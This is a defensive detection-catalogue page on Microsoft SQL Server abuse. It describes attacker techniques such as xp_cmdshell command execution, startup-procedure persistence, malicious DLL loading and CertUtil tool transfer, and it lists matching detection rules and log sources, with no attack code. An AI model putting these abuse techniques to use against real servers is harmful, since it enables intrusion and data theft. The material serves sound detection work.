Analytics Story: SQL Server Abuse

Description

This analytic story addresses various techniques used by threat actors to abuse Microsoft SQL Server for maintaining persistence, executing malicious commands, and exfiltrating data. It focuses on detecting suspicious SQLCMD usage, startup procedure modifications, DLL procedure loads, and other SQL Server abuse patterns that may indicate compromise.

Why it matters

Microsoft SQL Server is a common target for threat actors due to its widespread enterprise deployment and powerful capabilities. Attackers often abuse SQL Server features and components to achieve their objectives. Common attack patterns include using SQLCMD.exe for command execution and data exfiltration, modifying or creating startup procedures for persistence, and loading malicious DLLs through SQL Server procedures. Threat actors also frequently execute commands through xp_cmdshell and other extended stored procedures, leverage SQL Server Agent for scheduled task execution, and abuse trusted connections and elevated privileges. This story contains detections for various SQL Server abuse techniques. The detections focus on identifying suspicious SQLCMD.exe execution patterns and modifications to SQL Server startup procedures. They also monitor for unusual DLL loading through SQL Server, suspicious query patterns and command execution, anomalous authentication attempts, and potential data exfiltration indicators. Organizations should monitor SQL Server activity closely, especially usage of administrative features and extended stored procedures. A comprehensive security approach should include implementation of least privilege access principles, proper auditing mechanisms, and regular review of SQL Server configurations. These measures can help mitigate the risks posed by SQL Server abuse techniques commonly employed by threat actors.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
Windows PowerShell Invoke-Sqlcmd Execution PowerShell, Windows Command Shell Hunting
Windows SQL Server Configuration Option Hunt SQL Stored Procedures Hunting
Windows SQL Server Critical Procedures Enabled SQL Stored Procedures TTP
Windows SQL Server Extended Procedure DLL Loading Hunt SQL Stored Procedures, Cloud API Hunting
Windows SQL Server Startup Procedure SQL Stored Procedures Anomaly
Windows SQL Server xp_cmdshell Config Change SQL Stored Procedures TTP
Windows SQL Spawning CertUtil Ingress Tool Transfer TTP
Windows SQLCMD Execution Windows Command Shell Hunting
Windows Sqlservr Spawning Shell SQL Stored Procedures TTP

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
CrowdStrike ProcessRollup2 N/A crowdstrike:events:sensor crowdstrike
Powershell Script Block Logging 4104 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Application 15457 Windows icon Windows XmlWinEventLog XmlWinEventLog:Application
Windows Event Log Application 17135 Windows icon Windows XmlWinEventLog XmlWinEventLog:Application
Windows Event Log Application 8128 Windows icon Windows XmlWinEventLog XmlWinEventLog:Application
Windows Event Log Security 4688 Windows icon Windows xmlwineventlog XmlWinEventLog:Security

References


Source: GitHub | Version: 1